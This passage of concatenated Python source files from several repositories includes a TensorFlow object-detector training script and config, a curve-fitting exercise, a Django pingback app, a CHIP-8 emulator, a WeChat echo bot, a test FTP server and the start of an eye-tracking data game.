            if step % FLAGS.checkpoint_step == 0 or (step + 1) == FLAGS.max_steps:
                checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
                saver.save(sess, checkpoint_path, global_step=step)
            if step % FLAGS.summary_step == 0:
                # Periodic step: also evaluate and flush summaries.
                op_list = [
                    model_dp.train_op, summary_op
                ]
                loss, summary_str = sess.run(op_list)
                summary_writer.add_summary(summary_str, step)
                summary_writer.flush()
            else:
                loss = sess.run(model_dp.train_op)
            if step % FLAGS.print_step == 0:
                print('step: {} total_loss: {} time: {}'.format(step, loss, datetime.datetime.now()))
def main(argv=None):
    """Entry point: reset the training directory, then start training."""
    train_dir = FLAGS.train_dir
    # Always start from an empty event/checkpoint directory.
    if tf.gfile.Exists(train_dir):
        tf.gfile.DeleteRecursively(train_dir)
    tf.gfile.MakeDirs(train_dir)
    train()
if __name__ == '__main__':
    tf.app.run()
|
twangnh/Distilling-Object-Detectors-Shuffledet | param_count.py | <gh_stars>10-100
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import tensorflow as tf
import numpy as np
# Count trainable parameters stored in a TensorFlow checkpoint and report
# the implied float32 memory footprint.
parser = argparse.ArgumentParser(description='count parameters')
parser.add_argument('--model_path', dest='model_path',
                    help='model_path for counting parameters', default="",
                    type=str)
args = parser.parse_args()
ckpt_fpath = args.model_path
reader = tf.train.NewCheckpointReader(ckpt_fpath)
print('\nCount the number of parameters in ckpt file(%s)' % ckpt_fpath)
param_map = reader.get_variable_to_shape_map()  # variable name -> shape list
total_count = 0
sortednames = sorted(param_map.keys(), key=lambda x: x.lower())
for k in sortednames:
    # Skip optimizer slots and bookkeeping/auxiliary variables — they are
    # not model parameters.
    if 'Momentum' not in k and 'global_step' not in k \
            and 'iou' not in k and 'adaptation' not in k:
        temp = np.prod(param_map[k])
        total_count += temp
        print('%s: %s => %d' % (k, str(param_map[k]), temp))
print('Total Param Count: %d' % total_count)
mem = total_count * 4 / 1024 / 1024  # float32 params -> bytes -> MB
print('total memory: %4f MB' % mem)
twangnh/Distilling-Object-Detectors-Shuffledet | lib/config/kitti_shuffledet_config.py | <filename>lib/config/kitti_shuffledet_config.py
import numpy as np
from config import base_model_config
def kitti_shuffledet_config():
    """Return the model configuration for ShuffleDet on KITTI.

    Extends the base KITTI config with input geometry, optimization and
    loss hyper-parameters, inference thresholds and the anchor grid.
    """
    mc = base_model_config('KITTI')
    # Input geometry (KITTI images) and per-clone batch size.
    mc.IMAGE_WIDTH = 1248
    mc.IMAGE_HEIGHT = 384
    mc.BATCH_SIZE = 8
    # Optimization hyper-parameters.
    mc.WEIGHT_DECAY = 0.0005
    mc.LEARNING_RATE = 0.01
    mc.DECAY_STEPS = 10000
    mc.MAX_GRAD_NORM = 1.0
    mc.MOMENTUM = 0.9
    mc.LR_DECAY_FACTOR = 0.5
    # Loss weights: bbox regression / positive conf / negative conf / class.
    mc.LOSS_COEF_BBOX = 5.0
    mc.LOSS_COEF_CONF_POS = 75.0
    mc.LOSS_COEF_CONF_NEG = 100.0
    mc.LOSS_COEF_CLASS = 1.0
    # Inference-time thresholds.
    mc.PLOT_PROB_THRESH = 0.4
    mc.NMS_THRESH = 0.4
    mc.PROB_THRESH = 0.005
    mc.TOP_N_DETECTION = 64
    # Data augmentation: maximum random drift of the crop, in pixels.
    mc.DATA_AUGMENTATION = True
    mc.DRIFT_X = 150
    mc.DRIFT_Y = 100
    mc.EXCLUDE_HARD_EXAMPLES = False
    # Anchor grid: 9 shapes per cell of the 16x-downsampled feature map.
    mc.ANCHOR_BOX = set_anchors(mc)
    mc.ANCHORS = len(mc.ANCHOR_BOX)
    mc.ANCHOR_PER_GRID = 9
    return mc
def set_anchors(mc):
    """Build the (H*W*B, 4) anchor grid for a 16x-downsampled feature map.

    Each anchor is (center_x, center_y, width, height).  The B = 9 base
    shapes are replicated at every feature-map cell; cell centers are
    spaced evenly across the image with a half-step margin at the borders.
    """
    H, W, B = mc.IMAGE_HEIGHT // 16, mc.IMAGE_WIDTH // 16, 9
    anchor_shape_base = np.array(
        [[ 36.,  37.], [366., 174.], [115.,  59.],
         [162.,  87.], [ 38.,  90.], [258., 173.],
         [224., 108.], [ 78., 170.], [ 72.,  43.]])
    # Evenly spaced cell centers: k * image_size / (n + 1), k = 1..n.
    cx = np.arange(1, W + 1) * float(mc.IMAGE_WIDTH) / (W + 1)
    cy = np.arange(1, H + 1) * float(mc.IMAGE_HEIGHT) / (H + 1)
    grid = np.empty((H, W, B, 4))
    grid[..., 0] = cx[np.newaxis, :, np.newaxis]  # center x varies along W
    grid[..., 1] = cy[:, np.newaxis, np.newaxis]  # center y varies along H
    grid[..., 2:] = anchor_shape_base             # shapes broadcast over H, W
    return grid.reshape(-1, 4)
|
haojunsui/PSU-MATH-450-Mathematical-Modeling | Code/problem_1.py | <gh_stars>0
import numpy as np
from numpy.linalg import inv
import matplotlib.pyplot as plt
# Power-law fit y = a * x^b via least squares on log10-transformed data,
# plotted both in log-log space and in the original units.
x = np.matrix([74.4, 93.4, 110.4, 130.6, 148.9, 170.7, 191.1, 211.8, 231.7, 259.1]).transpose()
y = np.matrix([1.64, 2.03, 3.16, 3.96, 4.78, 6.21, 7.28, 8.91, 8.79, 8.63]).transpose()
x_log10 = np.log10(x)
# Design matrix [1, log10(x)]; solve the normal equations for [a0, b].
A = np.concatenate((np.matrix(np.ones(x.shape[0])).transpose(), x_log10), axis=1)
b = np.log10(y)
betas = inv(A.transpose() * A) * A.transpose() * b
y_log_fit = A * betas
plt.figure(figsize=(10, 8))
plt.plot(np.array(x_log10), np.array(b), "ro", markersize=8)
plt.plot(np.array(x_log10), np.array(y_log_fit), "b", linewidth=2)
plt.xlabel("$\log_{10}x$ (kg)", fontsize=24)
plt.ylabel("$\log_{10}y$ (kg)", fontsize=24)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.legend(["Data", "Best fit, $\log_{10}y = %.3f + %.3f\log_{10}x$" % (betas.item((0, 0)), betas.item((1, 0)))], loc="upper left", fontsize=20)
plt.savefig("problem_1_log_fit.eps", format="eps", dpi=1000)
plt.show()
print(betas.item((1, 0)))  # fixed: Python 2 print statement -> function call
# Back-transform to the original scale: y = 10^a0 * x^b.
y_fit = np.power(10, betas.item((0, 0))) * np.power(x, betas.item((1, 0)))
plt.figure(figsize=(10, 8))
plt.plot(np.array(x), np.array(y), "ro", markersize=8)
plt.plot(np.array(x), np.array(y_fit), "b", linewidth=2)
plt.xlabel("$x$ (kg)", fontsize=24)
plt.ylabel("$y$ (kg)", fontsize=24)
plt.xticks(fontsize=20)
plt.yticks(fontsize=20)
plt.legend(["Data", "Best fit, $y = %.3f * x ^ {%.3f}$" % (np.power(10, betas.item((0, 0))), betas.item((1, 0)))], loc="upper left", fontsize=20)
plt.savefig("problem_1_fit.eps", format="eps", dpi=1000)
plt.show()
|
tualatrix/django-pingback | pingback/admin.py | from django.contrib import admin
from pingback.models import Pingback, PingbackClient, DirectoryPing
class PingbackAdmin(admin.ModelAdmin):
    """Admin list view for pingbacks received by this site."""
    list_display = ('url', 'admin_object', 'date', 'approved', 'title')
admin.site.register(Pingback, PingbackAdmin)
class PingbackClientAdmin(admin.ModelAdmin):
    """Admin list view for pingbacks sent out by this site."""
    list_display = ('admin_object', 'url', 'date', 'success')
admin.site.register(PingbackClient, PingbackClientAdmin)
class DirectoryPingAdmin(admin.ModelAdmin):
    """Admin list view for pings sent to blog directory services."""
    list_display = ('url', 'date', 'success')
admin.site.register(DirectoryPing, DirectoryPingAdmin)
|
tualatrix/django-pingback | setup.py | <gh_stars>1-10
from setuptools import setup, find_packages
setup(
name = 'django-pingback',
version = '0.1.3',
description = 'Pingback client and server for Django web framework, extracted from Byteflow blog engine.',
keywords = 'django apps',
license = 'New BSD License',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://hg.piranha.org.ua/django-pingback/',
install_requires = ['django-xmlrpc>=0.1.0'],
dependency_links = ['http://pypi.aartemenko.com'],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages = find_packages(),
include_package_data = True,
)
|
tualatrix/django-pingback | pingback/templatetags/pingback_tags.py | <filename>pingback/templatetags/pingback_tags.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008 by <NAME> <<EMAIL>>
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
from django.template import Library, Node, TemplateSyntaxError, Variable
from pingback.models import Pingback
register = Library()
class FillContextForObjectParser(object):
    """Base parser for ``{% tag for <object> as <varname> %}`` template tags.

    Subclasses implement ``do_tag(object_variable, context_variable)`` and
    return the node to render.

    Fix: the Python-2-only ``raise Exc, msg`` statements (a SyntaxError on
    Python 3) are replaced with the call form, which is valid on both.
    The exception types and messages are unchanged.
    """
    def __call__(self, parser, token):
        tokens = token.split_contents()
        # Expected form: {% tag_name for object_var as context_var %}
        if len(tokens) != 5:
            raise TemplateSyntaxError("%r tag requires 4 arguments" % tokens[0])
        if tokens[1] != 'for':
            raise TemplateSyntaxError("First argument in %r tag must be 'for'" % tokens[0])
        if tokens[3] != 'as':
            raise TemplateSyntaxError("Third argument in %r tag must be 'as'" % tokens[0])
        object_variable = tokens[2]
        context_variable = tokens[4]
        return self.do_tag(object_variable, context_variable)
class PingbackBaseNode(Node):
    """Base template node holding the object and target variable names."""
    def __init__(self, object_variable, context_variable):
        # Name of the context variable filled in by render().
        self.context_variable = context_variable
        # Template variable resolving to the object whose pingbacks we want.
        self.object_variable = Variable(object_variable)
class PingbackListNode(PingbackBaseNode):
    """Node that stores the object's pingback list in the context."""
    def render(self, context):
        obj = self.object_variable.resolve(context)
        context[self.context_variable] = Pingback.objects.pingbacks_for_object(obj)
        return ''  # the tag renders nothing itself
class DoPingbackList(FillContextForObjectParser):
    """
    Gets list of Pingback objects for the given parameter and populates
    the context with a variable containing that list. The variable's
    name is defined by the `as` clause of the tag.
    Syntax::
        {% get_pingback_list for [context_var_containing_obj] as [varname] %}
    Example usage::
        {% get_pingback_list for object as pingback_list %}
    """
    def do_tag(self, object_variable, context_variable):
        return PingbackListNode(object_variable, context_variable)
class PingbackCountNode(PingbackBaseNode):
    """Node that stores the object's pingback count in the context."""
    def render(self, context):
        obj = self.object_variable.resolve(context)
        context[self.context_variable] = Pingback.objects.count_for_object(obj)
        return ''  # the tag renders nothing itself
class DoPingbackCount(FillContextForObjectParser):
    """
    Gets pingback count for the given params and populates the template
    context with a variable containing that value. The variable's name
    is defined by the `as` clause of the tag.
    Syntax::
        {% get_pingback_count for [context_var_containing_obj] as [varname] %}
    Example usage::
        {% get_pingback_count for object as pingback_count %}
    """
    def do_tag(self, object_variable, context_variable):
        return PingbackCountNode(object_variable, context_variable)
# Register both tags with the template library.
register.tag("get_pingback_count", DoPingbackCount())
register.tag("get_pingback_list", DoPingbackList())
Maxic/Chip-8 | cpu.py | import logging
import random
import numpy as N
class Cpu:
    """CHIP-8 CPU core: memory, registers, timers, display and opcodes.

    Fixes over the previous revision:
      * display buffer is the standard 64x32 pixels (was 63x31)
      * 5xy0 no longer advances the program counter twice
      * 7xkk, 8xy5, 8xy7 and 8xyE results wrap to 8 bits
      * 8xy6 uses an integer shift instead of float division
      * 8xyE tests the MSB with correct operator precedence
      * Dxyn XORs sprites onto the screen and reports collisions in VF
      * Ex9E compares against its real opcode value (was 0xE091)
      * Fx0A no longer ignores key 0
      * Fx33 decodes V[x] (the index was shifted a second time) with //
      * Fx55/Fx65 transfer registers V0 through Vx inclusive
      * Bnnn jumps to nnn + V0 without an extra increment
    """

    def __init__(self):
        # 4 KB of RAM; 0x000-0x1FF is reserved for the interpreter.
        self.memory = [0] * 4096
        # Sixteen 8-bit data registers V0..VF (VF doubles as a flag).
        self.V = [0] * 16
        # 16-bit address register.
        self.I = 0
        # 8-bit delay and sound timers.
        self.delay = 0
        self.sound = 0
        # Programs are loaded and start at 0x200.
        self.pc = 0x200
        # Call stack (16 levels) and stack pointer.
        self.stack_pointer = 0
        self.stack = [0] * 16
        # Monochrome display: 32 rows x 64 columns (standard CHIP-8).
        self.graphics = N.zeros((32, 64))
        # Built-in hexadecimal font, 5 bytes per glyph, stored at 0x50.
        self.sprite_pointer = 0x50
        self.sprites = [
            0xF0, 0x90, 0x90, 0x90, 0xF0,  # 0
            0x20, 0x60, 0x20, 0x20, 0x70,  # 1
            0xF0, 0x10, 0xF0, 0x80, 0xF0,  # 2
            0xF0, 0x10, 0xF0, 0x10, 0xF0,  # 3
            0x90, 0x90, 0xF0, 0x10, 0x10,  # 4
            0xF0, 0x80, 0xF0, 0x10, 0xF0,  # 5
            0xF0, 0x80, 0xF0, 0x90, 0xF0,  # 6
            0xF0, 0x10, 0x20, 0x40, 0x40,  # 7
            0xF0, 0x90, 0xF0, 0x90, 0xF0,  # 8
            0xF0, 0x90, 0xF0, 0x10, 0xF0,  # 9
            0xF0, 0x90, 0xF0, 0x90, 0x90,  # A
            0xE0, 0x90, 0xE0, 0x90, 0xE0,  # B
            0xF0, 0x80, 0x80, 0x80, 0xF0,  # C
            0xE0, 0x90, 0x90, 0x90, 0xE0,  # D
            0xF0, 0x80, 0xF0, 0x80, 0xF0,  # E
            0xF0, 0x80, 0xF0, 0x80, 0x80,  # F
        ]
        # Copy the font into RAM at the sprite pointer.
        for offset, byte in enumerate(self.sprites):
            self.memory[self.sprite_pointer + offset] = byte
        self.keys = list(range(16))
        logging.basicConfig(level=logging.DEBUG)

    def fetch_opcode(self, hexvalue):
        """Return the big-endian 16-bit opcode stored at address hexvalue."""
        return (self.memory[hexvalue] << 8) | self.memory[hexvalue + 1]

    def execute_operation(self, opcode, key):
        """Decode and execute one opcode.

        Parameters:
            opcode: 16-bit instruction word.
            key: currently pressed CHIP-8 key (0-15) or None.

        Raises:
            LookupError: for opcodes outside the base CHIP-8 set.
        """
        opcode_identifier = opcode & 0xF000
        nnn = opcode & 0xFFF           # 12-bit address operand
        kk = opcode & 0x00FF           # 8-bit immediate operand
        x = (opcode & 0x0F00) >> 8     # first register index
        y = (opcode & 0x00F0) >> 4     # second register index
        # Debug logging of the full machine state.
        logging.debug("Register I: " + hex(self.I))
        logging.debug("Program Counter: " + hex(self.pc))
        for i in range(0x10):
            logging.debug("Register V[" + hex(i) + "]: " + hex(self.V[i]))
        logging.debug('\n' + '\n'.join([''.join(['{:2}'.format(int(item)) for item in row])
                                        for row in self.graphics]))
        # 0XXX - Multiple opcodes
        if opcode_identifier == 0x0000:
            if opcode == 0x00E0:
                logging.debug(hex(opcode) + " == 00E0 - CLS - Clear the display")
                self.graphics = N.zeros_like(self.graphics)
                self.pc += 2
            elif opcode == 0x00EE:
                logging.debug(hex(opcode) + " == 00EE - RET - Return from a subroutine")
                # Resume just past the CALL that pushed this frame.
                self.pc = self.stack[self.stack_pointer] + 2
                self.stack_pointer -= 1
            else:
                raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
        # 1nnn - JP addr - Jump to location nnn.
        elif opcode_identifier == 0x1000:
            logging.debug(hex(opcode) + " == 1nnn - JP addr - Jump to location nnn")
            self.pc = nnn
        # 2nnn - CALL addr - Call subroutine at nnn.
        elif opcode_identifier == 0x2000:
            logging.debug(hex(opcode) + " == 2nnn - CALL addr - Call subroutine at nnn")
            self.stack_pointer += 1
            self.stack[self.stack_pointer] = self.pc
            self.pc = nnn
        # 3xkk - SE Vx, byte - Skip next instruction if Vx = kk.
        elif opcode_identifier == 0x3000:
            logging.debug(hex(opcode) + " == 3xkk - SE Vx, byte - Skip next instruction if Vx = kk")
            self.pc += 4 if self.V[x] == kk else 2
        # 4xkk - SNE Vx, byte - Skip next instruction if Vx != kk.
        elif opcode_identifier == 0x4000:
            logging.debug(hex(opcode) + " == 4xkk - SNE Vx, byte - Skip next instruction if Vx != kk")
            self.pc += 4 if self.V[x] != kk else 2
        # 5xy0 - SE Vx, Vy - Skip next instruction if Vx = Vy.
        elif (opcode_identifier == 0x5000) and (opcode & 0xF == 0x0):
            logging.debug(hex(opcode) + " == 5xy0 - SE Vx, Vy - Skip next instruction if Vx = Vy")
            # Fixed: a stray extra `pc += 2` made this skip too far.
            self.pc += 4 if self.V[x] == self.V[y] else 2
        # 6xkk - LD Vx, byte - Set Vx = kk.
        elif opcode_identifier == 0x6000:
            logging.debug(hex(opcode) + " == 6xkk - LD Vx, byte - Set Vx = kk")
            self.V[x] = kk
            self.pc += 2
        # 7xkk - ADD Vx, byte - Set Vx = Vx + kk (no carry flag, wraps).
        elif opcode_identifier == 0x7000:
            logging.debug(hex(opcode) + " == 7xkk - ADD Vx, byte - Set Vx = Vx + kk")
            self.V[x] = (self.V[x] + kk) & 0xFF
            self.pc += 2
        # 8XXX - register-to-register ALU operations.
        elif opcode_identifier == 0x8000:
            subop = opcode & 0xF
            if subop == 0x0:
                logging.debug(hex(opcode) + " == 8xy0 - LD Vx, Vy - Set Vx = Vy")
                self.V[x] = self.V[y]
            elif subop == 0x1:
                logging.debug(hex(opcode) + " == 8xy1 - OR Vx, Vy - Set Vx = Vx OR Vy")
                self.V[x] = self.V[x] | self.V[y]
            elif subop == 0x2:
                logging.debug(hex(opcode) + " == 8xy2 - AND Vx, Vy - Set Vx = Vx AND Vy")
                self.V[x] = self.V[x] & self.V[y]
            elif subop == 0x3:
                logging.debug(hex(opcode) + " == 8xy3 - XOR Vx, Vy - Set Vx = Vx XOR Vy")
                self.V[x] = self.V[x] ^ self.V[y]
            elif subop == 0x4:
                logging.debug(hex(opcode) + " == 8xy4 - ADD Vx, Vy - Set Vx = Vx + Vy, set VF = carry")
                total = self.V[x] + self.V[y]
                self.V[0xF] = 1 if total > 0xFF else 0
                self.V[x] = total & 0xFF
            elif subop == 0x5:
                logging.debug(hex(opcode) + " == 8xy5 - SUB Vx, Vy - Set Vx = Vx - Vy, set VF = NOT borrow")
                self.V[0xF] = 1 if self.V[x] > self.V[y] else 0
                self.V[x] = (self.V[x] - self.V[y]) & 0xFF  # fixed: wrap
            elif subop == 0x6:
                logging.debug(hex(opcode) + " == 8xy6 - SHR Vx {, Vy} - Set Vx = Vx SHR 1")
                self.V[0xF] = self.V[x] & 0x1    # bit shifted out
                self.V[x] = self.V[x] >> 1       # fixed: was float `/ 2`
            elif subop == 0x7:
                logging.debug(hex(opcode) + " == 8xy7 - SUBN Vx, Vy - Set Vx = Vy - Vx, set VF = NOT borrow")
                self.V[0xF] = 1 if self.V[y] > self.V[x] else 0
                self.V[x] = (self.V[y] - self.V[x]) & 0xFF  # fixed: wrap
            elif subop == 0xE:
                logging.debug(hex(opcode) + " == 8xyE - SHL Vx {, Vy} - Set Vx = Vx SHL 1")
                # Fixed precedence: `V[x] & 0x80 >> 7` tested bit 0.
                self.V[0xF] = (self.V[x] & 0x80) >> 7
                self.V[x] = (self.V[x] << 1) & 0xFF  # fixed: wrap
            else:
                raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
            self.pc += 2
        # 9xy0 - SNE Vx, Vy - Skip next instruction if Vx != Vy.
        elif (opcode_identifier == 0x9000) and (opcode & 0xF == 0x0):
            logging.debug(hex(opcode) + " == 9xy0 - SNE Vx, Vy - Skip next instruction if Vx != Vy")
            self.pc += 4 if self.V[x] != self.V[y] else 2
        # Annn - LD I, addr - Set I = nnn.
        elif opcode_identifier == 0xA000:
            logging.debug(hex(opcode) + " == Annn - LD I, addr - Set I = nnn")
            self.I = nnn
            self.pc += 2
        # Bnnn - JP V0, addr - Jump to location nnn + V0.
        elif opcode_identifier == 0xB000:
            logging.debug(hex(opcode) + " == Bnnn - JP V0, addr - Jump to location nnn + V0")
            # Fixed: a jump must not also advance the PC.
            self.pc = nnn + self.V[0]
        # Cxkk - RND Vx, byte - Set Vx = random byte AND kk.
        elif opcode_identifier == 0xC000:
            logging.debug(hex(opcode) + " == Cxkk - RND Vx, byte - Set Vx = random byte AND kk")
            self.V[x] = random.randint(0, 255) & kk
            self.pc += 2
        # Dxyn - DRW Vx, Vy, nibble - XOR an n-byte sprite at (Vx, Vy).
        elif opcode_identifier == 0xD000:
            logging.debug(hex(opcode) + " == Dxyn - DRW Vx, Vy, nibble - Display sprite and set collision")
            height = opcode & 0x000F
            rows, cols = self.graphics.shape
            col0 = self.V[x]  # Vx is the horizontal coordinate
            row0 = self.V[y]  # Vy is the vertical coordinate
            self.V[0xF] = 0   # collision flag, set if any pixel is erased
            for r in range(height):
                sprite_byte = self.memory[self.I + r]
                for c in range(8):
                    if (sprite_byte >> (7 - c)) & 1:
                        # Wrap around screen edges.
                        rr = (row0 + r) % rows
                        cc = (col0 + c) % cols
                        if self.graphics[rr][cc]:
                            self.V[0xF] = 1
                        # Fixed: sprites are XORed onto the display.
                        self.graphics[rr][cc] = 0 if self.graphics[rr][cc] else 1
            self.pc += 2
        # EXXX - keyboard skips.
        elif opcode_identifier == 0xE000:
            # Ex9E - SKP Vx (fixed: constant was 0xE091, which never matched).
            if (opcode & 0xF0FF) == 0xE09E:
                logging.debug(hex(opcode) + " == Ex9E - SKP Vx - Skip next instruction if key with the value of Vx is pressed")
                self.pc += 4 if key == self.V[x] else 2
            # ExA1 - SKNP Vx - Skip if key Vx is NOT pressed.
            elif opcode & 0xF0FF == 0xE0A1:
                logging.debug(hex(opcode) + " == ExA1 - SKNP Vx - Skip next instruction if key with the value of Vx is not pressed")
                self.pc += 4 if key != self.V[x] else 2
            else:
                raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
        # FXXX - timers, memory and font operations.
        elif opcode_identifier == 0xF000:
            subop = opcode & 0xF0FF
            if subop == 0xF007:
                logging.debug(hex(opcode) + " == Fx07 - LD Vx, DT - Set Vx = delay timer value")
                self.V[x] = self.delay
                self.pc += 2
            elif subop == 0xF00A:
                logging.debug(hex(opcode) + " == Fx0A - LD Vx, K - Wait for a key press, store the value of the key in Vx")
                # The PC only advances once a key is pressed.  Fixed: key 0
                # is a valid key, so test against None, not truthiness.
                if key is not None:
                    self.V[x] = key
                    self.pc += 2
            elif subop == 0xF015:
                logging.debug(hex(opcode) + " == Fx15 - LD DT, Vx - Set delay timer = Vx")
                self.delay = self.V[x]
                self.pc += 2
            elif subop == 0xF018:
                logging.debug(hex(opcode) + " == Fx18 - LD ST, Vx - Set sound timer = Vx")
                self.sound = self.V[x]
                self.pc += 2
            elif subop == 0xF01E:
                logging.debug(hex(opcode) + " == Fx1E - ADD I, Vx - Set I = I + Vx")
                self.I = self.I + self.V[x]
                self.pc += 2
            elif subop == 0xF029:
                logging.debug(hex(opcode) + " == Fx29 - LD F, Vx - Set I = location of sprite for digit Vx")
                # Each font glyph occupies 5 bytes.
                self.I = (self.V[x] * 5) + self.sprite_pointer
                self.pc += 2
            elif subop == 0xF033:
                logging.debug(hex(opcode) + " == Fx33 - LD B, Vx - Store BCD representation of Vx in memory locations I, I+1, and I+2")
                # Fixed: x is already the register index (was V[x >> 8]),
                # and integer division replaces float `/`.
                value = self.V[x]
                self.memory[self.I] = value // 100
                self.memory[self.I + 1] = (value // 10) % 10
                self.memory[self.I + 2] = value % 10
                self.pc += 2
            elif subop == 0xF055:
                logging.debug(hex(opcode) + " == Fx55 - LD [I], Vx - Store registers V0 through Vx in memory starting at location I")
                # Fixed: V0 through Vx inclusive (was always all 16).
                for i in range(x + 1):
                    self.memory[self.I + i] = self.V[i]
                self.pc += 2
            elif subop == 0xF065:
                logging.debug(hex(opcode) + " == Fx65 - LD Vx, [I] - Read registers V0 through Vx from memory starting at location I")
                # Fixed: V0 through Vx inclusive (was always all 16).
                for i in range(x + 1):
                    self.V[i] = self.memory[self.I + i]
                self.pc += 2
            else:
                raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
        else:
            raise LookupError(hex(opcode) + ": This operation is not available, are you using a Super Chip-8 ROM?")
|
Maxic/Chip-8 | chip8.py | <filename>chip8.py
from cpu import Cpu
import os
import pygame
"""
+-----------------------+
| CHIP-8 Emulator |
| |
| <NAME> 2018 |
+-----------------------+
"""
def main():
    """Emulator entry point: load a ROM and run the fetch/execute loop."""
    cpu = Cpu()
    # Initialize pygame and the keyboard -> CHIP-8 key mapping.
    key_lookup = initialize_io()
    key = None
    # NOTE(review): hard-coded path; '~Barend' only expands if a user named
    # Barend exists on this machine — a CLI argument is the TODO here.
    rom_path = "~Barend/Github/Chip-8/Roms/EMULOGO.ch8"
    load_rom(cpu.memory, cpu.pc, rom_path)
    # Main cycle: one opcode per iteration until the PC runs off memory.
    while cpu.pc <= 4096:
        # Remember the most recent keypress for the CPU to consume.
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                key = key_lookup[event.unicode]
        opcode = cpu.fetch_opcode(cpu.pc)
        hex_opcode = hex(opcode)   # NOTE(review): debug leftover, unused
        program_counter = cpu.pc   # NOTE(review): debug leftover, unused
        cpu.execute_operation(opcode, key)
def load_rom(memory, pc, rom_path):
    """Load a ROM file into RAM starting at address ``pc``.

    Parameters:
        memory: list of ints, the interpreter RAM (mutated in place).
        pc: int, load address (CHIP-8 programs normally start at 0x200).
        rom_path: path to the ROM file; ``~`` is expanded.

    Fixes: missing space in the status message; the file handle is now
    closed via a context manager; idiomatic enumerate replaces the manual
    index loop.
    """
    print("Loading ROM from " + rom_path)
    with open(os.path.expanduser(rom_path), "rb") as f:
        rom_data = f.read()
    # Copy the ROM bytes into RAM at the load address.
    for offset, byte in enumerate(rom_data):
        memory[pc + offset] = byte
def initialize_io():
    """Initialize pygame's display and return the char -> CHIP-8 key map.

    The 16-key CHIP-8 pad is mapped onto the left-hand letter block plus
    the number row of a QWERTY keyboard.
    """
    pygame.init()
    pygame.display.set_mode()
    key_lookup = {
        'q': 0,
        'w': 1,
        'e': 2,
        'a': 3,
        's': 4,
        'd': 5,
        'z': 6,
        'x': 7,
        'c': 8,
        '1': 9,
        '2': 10,
        '3': 11,
        '4': 12,
        '5': 13,
        '6': 14,
        '7': 15,
    }
    return key_lookup
if __name__ == "__main__":
    main()
|
ikeleeeeee/ItChat | myWeChatBot.py | import itchat
# Minimal WeChat echo bot: log in via QR code and reply to every incoming
# text message with the same text.
@itchat.msg_register(itchat.content.TEXT)
def print_content(msg):
    # Returning a string from a handler sends it back as the reply.
    return (msg['Text'])
itchat.auto_login()
itchat.run()
deniskovalchuk/ftp-client | test/ftp/server/server.py | <filename>test/ftp/server/server.py
#
# MIT License
#
# Copyright (c) 2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
def main():
    """Start a single-user test FTP server.

    Usage: server.py port home_directory

    Fix: the port from argv was passed to FTPServer as a string; the
    listen address needs an integer port.
    """
    if len(sys.argv) != 3:
        print("Usage: server.py port home_directory")
        return
    port = int(sys.argv[1])  # fixed: was left as a string
    home_directory = sys.argv[2]
    # Add user with the following permissions:
    # e - change directory (CWD, CDUP commands)
    # l - list files (LIST, NLST, STAT, MLSD, MLST, SIZE commands)
    # r - retrieve file from the server (RETR command)
    # a - append data to an existing file (APPE command)
    # d - delete file or directory (DELE, RMD commands)
    # f - rename file or directory (RNFR, RNTO commands)
    # m - create directory (MKD command)
    # w - store a file to the server (STOR, STOU commands)
    authorizer = DummyAuthorizer()
    authorizer.add_user("user", "password", home_directory, perm = "elradfmw")
    handler = FTPHandler
    handler.authorizer = authorizer
    handler.banner = "FTP server is ready."
    address = ("localhost", port)
    server = FTPServer(address, handler)
    server.serve_forever()
if __name__ == "__main__":
    main()
JortGroen/eyeMouse | src/data_creation_game4.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 7 11:00:24 2020
@author: djoghurt
"""
import cv2
import numpy as np
import dlib
from math import hypot
import pyautogui
import random
import subprocess
import json
import threading
import time
import os
receiveBuffer = ""
receiveStatus = 0
DATA = ""
stopReader = False
class screenShape:
    """Simple mutable holder for a screen's width/height in pixels."""
    # Both dimensions are set by the caller after construction.
    width = 0
    height = 0
def create_dot(screen, screenSize):
    """Clear the screen and draw a red target dot at a random position.

    Returns the (x, y) center of the dot.

    Fix: random.randint is inclusive at both ends, so the previous upper
    bounds of width/height could put the center one pixel outside the
    image; valid pixel coordinates run 0 .. size-1.
    """
    screen.fill(255)  # white background
    x = random.randint(0, screenSize.width - 1)
    y = random.randint(0, screenSize.height - 1)
    cv2.circle(screen, (x, y), 10, (0, 0, 255), -1)
    return (x, y)
def dotGreen(screen, targetLoc):
    """Repaint the screen white and redraw the target dot in green.

    Used to signal that gaze data has arrived for the current dot.
    """
